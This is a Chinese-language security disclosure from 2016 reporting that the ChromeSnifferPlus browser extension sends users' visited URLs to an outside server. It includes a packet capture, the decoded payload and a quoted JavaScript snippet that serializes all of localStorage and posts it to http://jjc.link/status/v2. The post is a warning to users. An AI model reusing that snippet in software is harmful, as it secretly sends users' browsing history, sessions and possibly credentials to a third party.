ChromeSnifferPlus插件疑似恶意采集用户访问信息

眯眯眼 | 2016-01-07 11:09

ChromeSnifferPlus插件疑似恶意采集用户访问信息

ChromeSnifferPlus是国人开发的一款开源网站探测插件,可以探测正在使用的开源软件或者 js 类库,在国内外都有一定的使用群体

该插件会一定条件下把用户访问过的url地址,后台发送到一个美国服务器

服务器URL地址为

  http://jjc.link/status/v2

**wireshark抓包**

POST /status/v2 HTTP/1.1

  Host: jjc.link

  Connection: keep-alive

  Content-Length: 1126

  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

  Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic

  Content-Type: application/x-www-form-urlencoded; charset=UTF-8

  Accept: */*

  Accept-Encoding: gzip,deflate,sdch

  Accept-Language: zh-CN,zh;q=0.8

  

  ld=%7B%22http%3A%2F%2Fqunaer.com%2F%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22%E7%99%BE%E5%BA%A6%E7%BB%9F%E8%AE%A1%5C%5C%5C%22%3A-1%2C%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.9.1%5C%5C%5C%22%2C%5C%5C%5C%22jQuery%20UI%5C%5C%5C%22%3A%5C%5C%5C%221.10.3%5C%5C%5C%22%2C%5C%5C%5C%22PHP%5C%5C%5C%22%3A%5C%5C%5C%225.2.17p1%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451980052484%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2F%3Frfrom%3Dsoso%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979843360%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2Fweb%3Fquery%3Dmanager%26_asf%3Dwww.sogou.com%26_ast%3D%26ie%3Dutf8%26pid%3Ds.idx%26cid%3Ds.idx.se%26rfrom%3Dsoso%26unc%3D%26w%3D01019900%26sut%3D1368%26sst0%3D1451979849303%26lkt%3D7%252C1451979847939%252C1451979849111%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979854478%7D%22%7DHTTP/1.1 200 OK

  Server: nginx

  Date: Tue, 05 Jan 2016 07:47:35 GMT

  Content-Type: text/html; charset=UTF-8

  Transfer-Encoding: chunked

  Connection: keep-alive

  Vary: Accept-Encoding

  Content-Encoding: gzip

  

  14

  ....................

  0


  

**数据包解密内容**

  ld={"http://qunaer.com/":"{\"libs\":\"{\\\"百度统计\\\":-1,\\\"jQuery\\\":\\\"1.9.1\\\",\\\"jQuery UI\\\":\\\"1.10.3\\\",\\\"PHP\\\":\\\"5.2.17p1\\\",\\\"nginx\\\":-1}\",\"add_time\":1451980052484}","http://www.sogou.com/?rfrom=soso":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979843360}","http://www.sogou.com/web?query=manager&_asf=www.sogou.com&_ast=&ie=utf8&pid=s.idx&cid=s.idx.se&rfrom=soso&unc=&w=01019900&sut=1368&sst0=1451979849303&lkt=7%2C1451979847939%2C1451979849111":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979854478}"}

  

经过多次抓包,发现服务器返回值都为 14/0,所以基本可以判断不是云查询类功能

作者在github的开源地址为

  https://github.com/justjavac/ChromeSnifferPlus

代码不多,经过排查,发现窃取信息的js为

  https://github.com/justjavac/ChromeSnifferPlus/blob/master/js/api.js

**代码片段**

var url = 'http://jjc.link/status/v2';

  

          if (localStorage.length === 0) {

              return;

          }

  

          var data = "ld=" + encodeURIComponent(JSON.stringify(localStorage));

  

          xhr('POST', url, data, function(data, status, response){

              callback();

          });


          

该代码会把chrome的localStorage都编码后发往jjc.link服务器,根据网站的验证方式不同,可能会泄露的隐私

* 用户ip

* 访问过的网站地址

* 网站后台

* 用户名/密码

* session值

**暂时不知作者收集这些信息的目的,请使用ChromeSnifferPlus的用户多加小心**